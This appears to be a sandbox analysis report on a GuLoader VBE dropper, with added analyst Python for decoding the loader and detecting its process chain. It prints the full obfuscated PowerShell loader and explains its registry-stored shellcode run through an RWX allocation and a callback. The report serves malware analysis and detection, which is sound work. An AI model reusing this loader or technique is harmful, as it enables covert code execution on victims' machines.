
Windows Analysis Report
PO-08784 xlsx.vbe

Overview

General Information

Sample Name: PO-08784 xlsx.vbe
Analysis ID: 755441
MD5: 266115592f966240c14dfeeec624bdf5
SHA1: 455a06b52d8e8f46d9a80067d3d1b1ea23036d65
SHA256: 1df8d51920f7e386c6b86379363cc42dd86fe47a933e36cecd23c7b08d3118e2
Tags: GuLoader, vbe

Detection

Score: 72
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Sigma detected: Dot net compiler compiles file from suspicious location
Obfuscated command line found
Wscript starts Powershell (via cmd or directly)
Machine Learning detection for dropped file
Very long command line found
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Drops PE files
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Compiles C# or VB.Net code
Found dropped PE file which has not been started or loaded
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)
Contains long sleeps (>= 3 min)
Abnormal high CPU Usage
Enables debug privileges

Classification

  • System is w10x64
  • wscript.exe (PID: 6000 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PO-08784 xlsx.vbe" MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
    • cmd.exe (PID: 5984 cmdline: CMD.EXE /c echo C:\Windows MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
      • conhost.exe (PID: 5964 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 5064 cmdline: C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Thyridia = """ovAfadAndDa-diTSiyFipOteCo Ro-FlTMuyZopPreAbDineVefpriDenabiSetFoiLroElnMy Fe'BouJasSuiinnSogud HoSMiyFesDetNoeIdmSa;VauMosPhiStnBegAu ViSPuyNesBrtTuevrmTa.HaRReuBenSctMaiEvmSteRk.InIinnWhtHoeOerAfoShpSoSEjeDerCavChiLicPieBrsDi;TrpRaudibfolLaiAlcvo BosPatAlaSktGoiGacGu LicDelSwaStsUnsRe PrMOpeSptSkhdeyMilNo1En di{Ci[DeDAnlOplglIIrmCopOpocurbutAf(Ef`"""UnkToeLorSenSrePelLi3Ko2ha`"""Fr)ji]VopAtuDrbunlReiMicNo KosDrtScaTitKriIrcPo CheSaxUntSleLyrtynGr SriEjnBetHu PeGLieTetDeTKahFirHveUnaBrdtrTInispmJeeItsCo(riiUgnJutCr BePInrSkoStgUnrFi8Op2We,RaiSwnSytAn MeFFirSkePsmSuaKhdOv,PriAfnHytre drTLieUnlCoeNo,ReiTvnMitFo WiTAbrFueSydCyiAf,raisbnCotUr OpTmyiStmTr)Sp;Ti[BoDKrlFilMeIRomUnpKeoAfrCitSu(Ha`"""GeuunsSeeNarWi3Su2Sc`"""Us)Ci]NypCeuTobPelAdiEfcUd SqsCotGaaRetNaiDrcRo SmebyxDotJaeGtrTrnPe BliChnAdtJa PoCInlAciTyePanBrtUlTTroFoSRecTirVaeMdeLenBr(NeiStnGltOv SiIUdnWrkLioSprBapre,coicenCotMe ZetCoeFrkplnFaore)Al;Un[MuDUnlcalHeINumfrpTyoPirBrtKi(Fo`"""WakWoeTwrFanFreUnlPr3Ru2Su`"""St)Fr]UdpdeuAlbCalTriCrcRe CosRutGraAltVeiTacTi VaeSlxUstboeNerGenPa DiiSunOktCa InEOvxhapSaaUhnPldUnEBrnSavPaistrProTrnDrmSteHynFetflSWotunrSviDanAbgWesFi(EriBlnretSt ReREcoCytSotDeePo,TeiChnRetSu FoBUfugalMa,BiiMonBitDe InEBrnOetafoCo)Re;Ra[PlDLalAvlFuIAfmSkpBeoAnrSutKo(te`"""BeuElsJieElrst3Mu2Fy`"""Di)To]PopVauanbBrlMaiPucOs OvsRetPeaPrtPeiUfcSo toeFoxOvtMaeNorTenSl PriFrnQutbl AmEEgnPuuBamauCPihPoiDilNedBeWIsiEfnFldFrokiwbesSo(MiiHonTatFu hoLMiiOvtRahFoeIndRo,aniGenCatal HyDReiFooSubMooSl,MeiOlnTutCh PoATalUvuVanUngAl)Va;Tr[emDSelKrlGoIJamPrpCooCrrRetst(Yo`"""MawbeiVinLamComBi.NldSelFllHe`"""De)No]IlpOpuChbTelOmiBucFo frsRetCoaChtUdiJucSa UnePnxRetMaekvrLgnEl veiMenIntBr InjAuoOpyHuSAceSetDiCDiaGepSutBeuAvrOueCe(IdiWenfotEx AfKPeoAndUniPofNo,SeiSpnRetBe UnVFaeLijBe,FriEsnWitOp abEDimChpUntMoiSp,CeiUnnLatFl 
BiRUreUdaVicCytduiNe)Po;No[NoDTnlHylOuIOpmAkpdeoBerAptIr(Un`"""OpkHmeNirdrnAmeMolGr3Sf2El`"""Kr)Li]ScpViuGrbBrlRiiItcPr ResFrtGsaIrtApiPacPo UneUhxKrtSyeMarRanIr skvAfoByiOpdDe ImGjulReoFabDiaNalSpMMaeLimMyoVarBryhjSEttSuaTutAnufrsUb(sniFrnretRa SuAWrnJelEpgSksEmiUd)Ou;Cy[FiDDrlSplClIbamanpAtoCorBotNo(Si`"""OvkAneMirUnnGaeColPr3Co2Na`"""Gr)Pr]mopTouHabdrlPhiSkcNa sksmatStaSetDiiAicva HaeLyxFotUneEnrbrnCo SaiJunPstAk UnISnsObVPuaColSpiPldAgCMooTodSteSuPSuaMagsueSa(EjiAfnHytBi CaGGaaKauudmCa)Fr;Fa[CoDPhlHylUnIDimTypOvorurMitFo(Mi`"""UnkSeeLirBenRieJulCh3Sl2An`"""Sa)Si]AmpwhuElbSelLaiSucKl MtsRbtLoaSptReiFocAj MieunxEvtSneForBunCu AmiTenEftTe SuHOreOvaDapBiRpleSeABilDelsooRycac(DoiKonSltFo StHFraBlnBedBi,EsihenNotRk ApFUnaSplSesOl,BiiDanSutSu coHDruConLegBa,AfiTrnNetNo RoUTrnRbdSeeSsrNe)Fo;Ko[FlDPilPelStIDamTepHyoSyrSytJe(Ub`"""BrgUndReiGl3Ud2Un`"""Ep)Pr]MipUnuUnbFolAdiAfcBa FesShtDiaDitBeiDecVe SieYaxSktKeePrrRenIn CoiMynNetBl UnCCorMeeEvaImtskeThSPaoHelUhiExdAlBLerDiuCascahPa(BeiBonVatUh CaFSyoHirBa)Mi;Pe[CuDDilOulDeIAimLapKroGrrOvtDi(Ar`"""TakRaeOcrSpnDieSelHa3Ax2Ne`"""Ov)Su]InpTouVibStlSaiFucAb HasBltPhaDitFeiMacTo paeWaxSltSleRarTenCa ThiDenkatOv MiVJeiRersktLuuDiabalUnAPylUnlDaoCocAb(moimunGatke FevNa1Da,KoiGrnAntbi FivCr2Se,KriLanhvtAg Savaa3go,NoilenMatNa PavSe4Co)Im;Ma[DeDTilStlStIKlmpupLuoCarMitHa(Tv`"""BakVieEnrBenSteEllTh3Hu2bi`"""Tr)Pl]PopHauLabsalIniRacFj UnsBetBoasltDkiPocHi PhevaxGntNoeGurMrnFl AcIAgnIntKoPDatAnrOs SwELinWeuHamStSCoySksMatSlePlmfeLMooKacdeaKolCueSysDyWaf(OmuFoiBonChtMy TavBo1Ha,KiiSonOptSh FavUn2Ud)Un;Na}Li'Sl;Ar`$jeMHyeDatSuhmuyUrlLi3Ne=Ha[TiMAdeLytFehFoyMilCa1re]co:Ov:beVNoisyrretWhuAbaTelNoAAklGalUnoSicLi(In0Dr,ro1Ch0De4Ro8Le5Ob7sk6Co,Le1Me2Sp2Sv8Lo8Ea,No6ph4Mi)Mi;Re`$StSTaeBelKovRefLrlTrgEbeNylBeiBrgDu=Pr(BrGFieGytDe-reISttKreViminPDorSaoIrpBeeLarJetAfySc Ex-WoPCraSptAzhDe 
Tr'SvHveKFoCCoUUd:Co\CebKraResAnaBrlBotCa\DetAprGuaManFisNofEsonurMemKoaSktSkiByoAbnOushaaSulScgCioSkrExiVitCimSieCyregnIreUd'Pa)tu.LuBBoeEthsueAlaDyrStsReeJa;Be`$UnGHirEmiFosRakUneEn Bu=Bi Br[AsSTiyUnsObtTweDrmBe.LiCStoRenorvKieVarAptEn]Ma:Ap:GeFKlrInoMumUdBseaImsInePl6fi4CaSVotBarBaiTonWagva(Se`$BeSLeeSnlBlvJafHulAfgpeeFrlBeiPhgGi)Ap;Pu[PiSOvyelsThtOxeSemge.SiRObuFrnBrtapiMumKleju.PiISpnRatIneUnrSyoAppneSPreSkrCovTiiJacAkeLessl.SiMStaTarFosCohTaaprlFa]Bl:Ci:TrCBooOupSkyAf(Fl`$UnGKurPaiKrsBrkDrece,di Pe0Up,Br Vl Pi`$GlMNieBatBlhSiyMylDe3Pr,Pr Sp`$ZoGArrCriTesHakPheSt.PrcGroSpuPonKntSp)Ph;Ho[TiMHeeAltAkhKnyPrlFa1Au]Si:Ru:CuEHjnPruMemFrSKoyressetKoeSpmVoLSloNucCaaMulpeeinsOvWBr(Sa`$AvMSkeNotSthDdyStlMe3Ir,Ka Ud0Sl)Ne#Sc;""";Function Methyl4 { param([String]$HS); For($i=2; $i -lt $HS.Length-1; $i+=(2+1)){ $Teviss = $Teviss + $HS.Substring($i, 1); } $Teviss;}$Undefatigable0 = Methyl4 'SoIOrEReXAq ';$Undefatigable1= Methyl4 $Thyridia;&$Undefatigable0 $Undefatigable1;; MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 4620 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • csc.exe (PID: 2912 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\bqup1euq\bqup1euq.cmdline MD5: 350C52F71BDED7B99668585C15D70EEA)
        • cvtres.exe (PID: 2044 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES47C6.tmp" "c:\Users\user\AppData\Local\Temp\bqup1euq\CSCA347F263B587453BB38F4BBC1F3B31.TMP" MD5: C09985AE74F0882F208D75DE27770DFA)
  • cleanup
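The powershell.exe command line in the tree above ships its own decoder: `Methyl4` keeps every third character of its argument starting at offset 2, `Methyl4 'SoIOrEReXAq '` yields the invoker name (`IEX`), and the decoded `$Thyridia` is then invoked through it. Applying that decode to the string on this page gives an `Add-Type -TypeDefinition` block (which is what produces the csc.exe/cvtres.exe pair and the Sigma hit) declaring P/Invoke stubs against kernel32, user32, winmm.dll and gdi32, followed by `VirtualAlloc(0,1048576,12288,64)`, a `Get-ItemProperty` read of `HKCU:\basalt\transformationsalgoritmerne`, `FromBase64String`, `Marshal::Copy` into the allocated buffer and a call through `EnumSystemLocalesW` with that buffer as the callback. The script below is an added analyst example, not part of the report or of the sample: it ports the decoder to Python and runs it over two fragments copied from the command line above (constructed samples; the `"""` and backtick escapes of the command line are collapsed to the plain `"` and `$` that PowerShell ends up with). The flag tables and the `summarize`/`virtualalloc_args` helpers are mine.

```python
import re

# Faithful port of the Methyl4 decoder from the page's PowerShell command line:
#   For($i=2; $i -lt $HS.Length-1; $i+=(2+1)){ $Teviss = $Teviss + $HS.Substring($i, 1) }
# Every third character from offset 2 is payload; the two before it are junk.
# The loop bound (Length-1) silently drops a payload character that lands on the
# last index, which is why the samples below end on a junk pair.
def methyl4_decode(hs: str) -> str:
    return "".join(hs[i] for i in range(2, len(hs) - 1, 3))


# $Undefatigable0 = Methyl4 'SoIOrEReXAq ' selects the invoker name.
INVOKER_ENCODED = "SoIOrEReXAq "

# Constructed sample: the first 387 characters of $Thyridia as they appear in the
# report, with the command-line quoting (`""") collapsed to the single " that
# PowerShell sees inside the double-quoted string.
THYRIDIA_PREFIX = (
    "ovAfadAndDa-diTSiyFipOteCo Ro-FlTMuyZopPreAbDineVefpriDenabiSetFoiLroElnMy "
    "Fe'BouJasSuiinnSogud HoSMiyFesDetNoeIdmSa;"
    "VauMosPhiStnBegAu ViSPuyNesBrtTuevrmTa.HaRReuBenSctMaiEvmSteRk."
    "InIinnWhtHoeOerAfoShpSoSEjeDerCavChiLicPieBrsDi;"
    "TrpRaudibfolLaiAlcvo BosPatAlaSktGoiGacGu LicDelSwaStsUnsRe PrMOpeSptSkhdeyMilNo1En "
    'di{Ci[DeDAnlOplglIIrmCopOpocurbutAf(Ef"UnkToeLorSenSrePelLi3Ko2ha"Fr)ji]Vop'
)

# A later fragment of the same string (backtick escape before $ removed), copied
# from a triple boundary so that it decodes on its own.
THYRIDIA_ALLOC = (
    "Ar$jeMHyeDatSuhmuyUrlLi3Ne=Ha[TiMAdeLytFehFoyMilCa1re]co:Ov:"
    "beVNoisyrretWhuAbaTelNoAAklGalUnoSicLi(In0Dr,ro1Ch0De4Ro8Le5Ob7sk6Co,"
    "Le1Me2Sp2Sv8Lo8Ea,No6ph4Mi)Mi;"
)

# Win32 constants used to read the VirtualAlloc arguments (my own lookup tables).
MEM_FLAGS = {0x1000: "MEM_COMMIT", 0x2000: "MEM_RESERVE"}
PAGE_PROTECT = {0x04: "PAGE_READWRITE", 0x20: "PAGE_EXECUTE_READ", 0x40: "PAGE_EXECUTE_READWRITE"}


def summarize(decoded: str) -> dict:
    """Cmdlet the decoded stage starts with and the DllImport targets it declares."""
    return {
        "cmdlet": decoded.split(" ", 1)[0],
        "dllimports": re.findall(r'DllImport\("([^"]+)"\)', decoded),
    }


def virtualalloc_args(decoded: str):
    """Decode a VirtualAlloc(addr, size, allocType, protect) call, if one is present."""
    m = re.search(r"VirtualAlloc\((\d+),(\d+),(\d+),(\d+)\)", decoded)
    if m is None:
        return None
    _addr, size, alloc_type, protect = (int(x) for x in m.groups())
    return {
        "size": size,
        "alloc_type": sorted(name for bit, name in MEM_FLAGS.items() if alloc_type & bit),
        "protect": PAGE_PROTECT.get(protect, hex(protect)),
    }


if __name__ == "__main__":
    print(methyl4_decode(INVOKER_ENCODED))  # IEX
    stage = methyl4_decode(THYRIDIA_PREFIX)
    print(stage)
    print(summarize(stage))
    alloc = methyl4_decode(THYRIDIA_ALLOC)
    print(alloc, virtualalloc_args(alloc))
```

Two things worth checking in any variant of this loader: the decoder's stride and offset (here 3 and 2; the junk characters are chosen to look like word fragments, so a visual read is unreliable), and the `VirtualAlloc` protection argument, since 12288 (0x3000, MEM_COMMIT|MEM_RESERVE) plus 64 (0x40, PAGE_EXECUTE_READWRITE) is the RWX allocation that the later `Marshal::Copy` and callback invocation turn into shellcode execution.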
No configs have been found
Source: PO-08784 xlsx.vbe | Rule: WScript_Shell_PowerShell_Combo | Description: Detects malware from Middle Eastern campaign reported by Talos | Author: Florian Roth | Strings:
  • 0xa2e:$s1: .CreateObject("WScript.Shell")
  • 0x3ed54:$p1: powershell.exe
  • 0x4b97e:$p1: powershell.exe
Source: Process Memory Space: powershell.exe PID: 5064 | Rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Description: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | Author: ditekSHen | Strings:
  • 0x7ef78:$b2: ::FromBase64String(
  • 0x177dc3:$b2: ::FromBase64String(
  • 0x17968c:$b2: ::FromBase64String(
  • 0x16d76:$s1: -join
  • 0x17090:$s1: -join
  • 0x23ac3:$s1: -join
  • 0x91a1f:$s1: -join
  • 0xa0480:$s1: -join
  • 0xa0be0:$s1: -join
  • 0xb6d35:$s1: -join
  • 0xc3e0a:$s1: -join
  • 0xc71dc:$s1: -join
  • 0xc788e:$s1: -join
  • 0xc937f:$s1: -join
  • 0xcb585:$s1: -join
  • 0xcbdac:$s1: -join
  • 0xcc61c:$s1: -join
  • 0xccd57:$s1: -join
  • 0xccd89:$s1: -join
  • 0xccdd1:$s1: -join
  • 0xccdf0:$s1: -join
Source: amsi64_6000.amsi.csv | Rule: WScript_Shell_PowerShell_Combo | Description: Detects malware from Middle Eastern campaign reported by Talos | Author: Florian Roth | Strings:
  • 0x1a:$s1: .CreateObject("WScript.Shell")
  • 0x72:$s1: .CreateObject("WScript.Shell")
  • 0x1e4:$p1: powershell.exe
Note: the strings this rule keys on (a WScript.Shell instantiation plus the literal powershell.exe) are generic to any VBS/JS dropper that launches PowerShell; the "Middle Eastern campaign" wording describes the rule's origin, not an attribution of this sample, which is tagged GuLoader above.

Data Obfuscation

Sigma rule (from the Signatures list above): Dot net compiler compiles file from suspicious location
Source: Process started | Author: Joe Security | Data:
  Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\bqup1euq\bqup1euq.cmdline
  CommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\bqup1euq\bqup1euq.cmdline
  CommandLine|base64offset|contains: zw
  Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
  NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
  OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
  ParentCommandLine: C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Thyridia = """ovAfadAndDa-... (the obfuscated PowerShell command line, reproduced in full in the process tree above; the report truncates it at this point)
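The csc.exe launch recorded above is the event the Sigma signature keys on, and the rest of the chain (wscript.exe spawning cmd.exe and powershell.exe, a 4705-byte command line) is what the other process-related signatures in this report flag. The following is an added example, not part of the Joe Sandbox report or of Joe Security's Sigma rule: it runs simple versions of those checks over constructed Sysmon-style process-creation records modelled on this report's process tree. The rule names, the 2000-byte threshold, the suspicious-directory list, the explorer.exe parent for wscript.exe (reported as "unknown") and the benign MSBuild control event are all my own assumptions.

```python
# Constructed Sysmon-style (Event ID 1) process-creation records modelled on the
# chain in this report: wscript.exe -> cmd.exe / powershell.exe -> csc.exe -> cvtres.exe.
# The 4705-byte obfuscated PowerShell command line is stood in for by filler of
# similar length; the wscript.exe parent is assumed to be explorer.exe.
PS_EXE = r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
CSC_EXE = r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"
CVTRES_EXE = r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"
WSCRIPT_EXE = r"C:\Windows\System32\wscript.exe"

EVENTS = [
    {"Image": WSCRIPT_EXE, "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PO-08784 xlsx.vbe"'},
    {"Image": r"C:\Windows\System32\cmd.exe", "ParentImage": WSCRIPT_EXE,
     "CommandLine": r"CMD.EXE /c echo C:\Windows"},
    {"Image": PS_EXE, "ParentImage": WSCRIPT_EXE,
     "CommandLine": '"' + PS_EXE + '" "$Thyridia = ' + "x" * 4600 + '"'},
    {"Image": CSC_EXE, "ParentImage": PS_EXE,
     "CommandLine": '"' + CSC_EXE + r'" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\bqup1euq\bqup1euq.cmdline"'},
    {"Image": CVTRES_EXE, "ParentImage": CSC_EXE,
     "CommandLine": CVTRES_EXE + r' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES47C6.tmp" "c:\Users\user\AppData\Local\Temp\bqup1euq\CSCA347F263B587453BB38F4BBC1F3B31.TMP"'},
]

# Constructed benign control: the same compiler invoked by a build tool from a source tree.
BENIGN_BUILD = {
    "Image": CSC_EXE,
    "ParentImage": r"C:\Program Files\Microsoft Visual Studio\2022\Community\MSBuild\Current\Bin\MSBuild.exe",
    "CommandLine": '"' + CSC_EXE + r'" /noconfig @"C:\src\app\obj\Debug\app.csproj.cmdline"',
}

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe"}
COMPILERS = {"csc.exe", "vbc.exe"}
# Directories a user-writable compile job lands in; matched case-insensitively.
SUSPICIOUS_DIRS = ("\\appdata\\local\\temp\\", "\\users\\public\\", "\\windows\\temp\\", "\\programdata\\")
LONG_CMDLINE = 2000  # bytes; the report's "Very long command line" hit was 4705


def _name(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def detect(ev: dict) -> list:
    """Return the names of the checks an event triggers, in a fixed order."""
    hits = []
    image, parent = _name(ev["Image"]), _name(ev["ParentImage"])
    cmdline = ev["CommandLine"]
    if parent in SCRIPT_HOSTS and image in SHELLS:
        hits.append("script_host_spawns_shell")
    if image in SHELLS and len(cmdline) > LONG_CMDLINE:
        hits.append("very_long_command_line")
    if image in COMPILERS and any(d in cmdline.lower() for d in SUSPICIOUS_DIRS):
        hits.append("dotnet_compiler_suspicious_location")
    if image in COMPILERS and parent in {"powershell.exe", "pwsh.exe"}:
        hits.append("powershell_compiles_code")
    return hits


def scan(events: list) -> list:
    """(image name, triggered checks) for every event that triggered at least one."""
    return [(_name(e["Image"]), h) for e in events if (h := detect(e))]


if __name__ == "__main__":
    for name, hits in scan(EVENTS):
        print(name, hits)
```

The compiler check on its own is a hunting signal rather than a verdict: every `Add-Type -TypeDefinition` in legitimate PowerShell produces exactly this csc.exe and cvtres.exe pair working out of `%TEMP%`, so it should be scored together with the parent chain (script host to PowerShell) and the command-line length, which is what separates this sample's chain from an administrator's script.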
No Snort rule has matched


AV Detection

Source: C:\Users\user\AppData\Local\Temp\bqup1euq\bqup1euq.dll | Joe Sandbox ML: detected
Source: Binary string: l:C:\Users\user\AppData\Local\Temp\bqup1euq\bqup1euq.pdb source: powershell.exe, 00000003.00000002.541727874.0000000005789000.00000004.00000800.00020000.00000000.sdmp
Source: powershell.exe, 00000003.00000002.545558610.0000000005F20000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000003.00000002.528909181.0000000004FFF000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000003.00000002.526784989.0000000004EC1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000003.00000002.528909181.0000000004FFF000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000003.00000002.545558610.0000000005F20000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000003.00000002.545558610.0000000005F20000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000003.00000002.545558610.0000000005F20000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000003.00000002.528909181.0000000004FFF000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000003.00000002.536819420.0000000005484000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://go.micro
Source: powershell.exe, 00000003.00000002.545558610.0000000005F20000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe
Note: the nuget.org, pesterbdd.com, github.com/Pester/Pester and contoso.com placeholder URLs are string constants from the Pester and PackageManagement modules bundled with Windows PowerShell and turn up in clean powershell.exe memory as well; they are not infrastructure used by this sample.

System Summary

Source: Process Memory Space: powershell.exe PID: 5064, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\cmd.exe CMD.EXE /c echo C:\Windows
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe with the 4705-byte obfuscated command line ($Thyridia = ...; Function Methyl4 ...) reproduced in full in the process tree above
Source: C:\Windows\System32\wscript.exe | Process created: Commandline size = 4705
Source: PO-08784 xlsx.vbe, type: SAMPLE | Matched rule: WScript_Shell_PowerShell_Combo date = 2018-02-07, author = Florian Roth, description = Detects malware from Middle Eastern campaign reported by Talos, score = 15f5aaa71bfa3d62fd558a3e88dd5ba26f7638bf2ac653b8d6b8d54dc7e5926b, reference = http://blog.talosintelligence.com/2018/02/targeted-attacks-in-middle-east.html, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: amsi64_6000.amsi.csv, type: OTHER | Matched rule: WScript_Shell_PowerShell_Combo date = 2018-02-07, author = Florian Roth, description = Detects malware from Middle Eastern campaign reported by Talos, score = 15f5aaa71bfa3d62fd558a3e88dd5ba26f7638bf2ac653b8d6b8d54dc7e5926b, reference = http://blog.talosintelligence.com/2018/02/targeted-attacks-in-middle-east.html, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: Process Memory Space: powershell.exe PID: 5064, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process Stats: CPU usage > 98%
Source: C:\Windows\System32\wscript.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Section loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll
Source: unknown | Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PO-08784 xlsx.vbe"
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\cmd.exe CMD.EXE /c echo C:\Windows
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe with the 4705-byte obfuscated command line ($Thyridia = ...; Function Methyl4 ...) reproduced in full in the process tree above
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\bqup1euq\bqup1euq.cmdline
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES47C6.tmp" "c:\Users\user\AppData\Local\Temp\bqup1euq\CSCA347F263B587453BB38F4BBC1F3B31.TMP"
Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3743-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32 (the VBScript engine CLSID; the .vbe is decoded and run by that engine)
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5964:120:WilError_01
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4620:120:WilError_01
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5urju1b3.luw.ps1 (PowerShell's standard script-policy probe file, written on every start, not something the sample created)
Source: classification engine | Classification label: mal72.expl.winVBE@11/9@0/0
Source: C:\Windows\System32\wscript.exe | File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Data Obfuscation

